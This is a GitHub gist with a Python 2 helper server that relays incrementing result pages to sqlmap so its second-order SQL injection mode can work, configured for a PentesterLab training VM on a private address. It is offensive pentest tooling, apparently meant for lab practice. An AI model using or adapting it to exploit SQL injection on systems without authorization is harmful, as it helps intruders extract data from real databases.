Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Helper example middleware server to enable sqlmap to use its second-order exploitation option with changing urls
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import sys
import urllib
import logging
from optparse import OptionParser
# Helper example middleware server to enable sqlmap to use its second-order exploitation option with changing urls
# modify as needed for your purposes
# To Use:
# Create your own implementation of the ResultsProvider class which returns the desired page with the nextResult method
# An example of how this can be done for a URL with incrementing value is shown in ResultsProviderImpl
# create an instance of the ThreadedTCPServer, and pass the resultsProvider and any desired parameters in like so
#httpd = ThreadedTCPServer(("", port), ServerHandler)
#httpd.resultsProvider = ResultsProviderImpl(url='http://server/base/path', counter=23)
#httpd.serve_forever()
# Then run sqlmap with the second order option pointing to this server, e.g.
# --second-order=http://127.0.0.1:8000/
# When sqlmap queries this server for the second order result, this server will fetch the appropriate result
# from the remote server and then supply it back to sqlmap, also allowing you to modify the response if desired
class ResultsProvider(object):
'''Base class used to fetch data from server for second order injection using sqlmap'''
import requests
import socket
import time
def __init__(self, **kwargs):
'''Constructor with sensible requests defaults'''
self.session = self.requests.Session()
self.wait = kwargs.get('wait', 2.0)
self.session.verify = kwargs.get('verify', False)
self.session.timeout = kwargs.get('timeout', 5)
self.session.stream = kwargs.get('stream', False)
self.session.proxies = kwargs.get('proxies', {})
self.session.headers = kwargs.get('headers', {})
self.session.allow_redirects = kwargs.get('allow_redirects', True)
self.session.cookies = self.requests.utils.cookiejar_from_dict(kwargs.get('cookies', {}))
self.url = kwargs.get('url', None)
def doRequest(self, url, params=None, **kwargs):
'''Makes web request with timeoout support using requests session'''
while 1:
try:
response = self.session.get(url, params=params, **kwargs)
break
except (self.socket.error, self.requests.exceptions.RequestException):
logging.exception('Retrying request in %.2f seconds...', self.wait)
self.time.sleep(self.wait)
continue
return response
def nextResult(self):
'''Redefine me to make the request and return the response.text'''
#return self.doRequest(url='http://site/whatever/' + str(calculated_value)).text
raise NotImplementedError
class ResultsProviderImpl(ResultsProvider):
'''Example implementation to exploit 2nd order injection in Pentesterlabs Web II SQL Injection'''
def __init__(self, **kwargs):
super(ResultsProviderImpl, self).__init__(**kwargs)
self.counter=kwargs.get('counter', 1)
def nextResult(self):
r = self.doRequest(url=self.url + str(self.counter))
self.counter+=1
return r.text
class ThreadedTCPServer(SocketServer.ThreadingTCPServer):
'''Simple Threaded TCP server'''
pass
class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
'''Simple http server request handler'''
def do_GET(self):
if self.server.debug:
print '=' * 40 + '\n'
print self.headers
print '=' * 40 + '\n'
self.send_response(200)
self.wfile.write('\r\n')
result = self.server.resultsProvider.nextResult()
self.wfile.write(result)
if self.server.debug:
print '=' * 40 + '\n'
print result
print '=' * 40 + '\n'
self.wfile.write('\r\n')
self.wfile.flush()
self.wfile.close()
if __name__ == '__main__':
parser = OptionParser(usage='%prog [options] <httpport>')
parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages')
opts, args = parser.parse_args()
if len(args) == 1:
try:
port = int(args[0])
except ValueError:
parser.print_help()
parser.exit()
else:
port = 8000
# parameters for example
# base url where second order injection occurs
baseUrl = 'http://192.168.33.101/sqlinjection/example8/users/'
# starting point to count upwards from in injected results
baseNo = 738
httpd = ThreadedTCPServer(("", port), ServerHandler)
httpd.debug = opts.debug or False
# add the custom resultsprovider implementation
httpd.resultsProvider = ResultsProviderImpl(url=baseUrl, counter=baseNo)
print "Serving at: http://%s:%s/" % ('127.0.0.1', str(port))
httpd.serve_forever()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment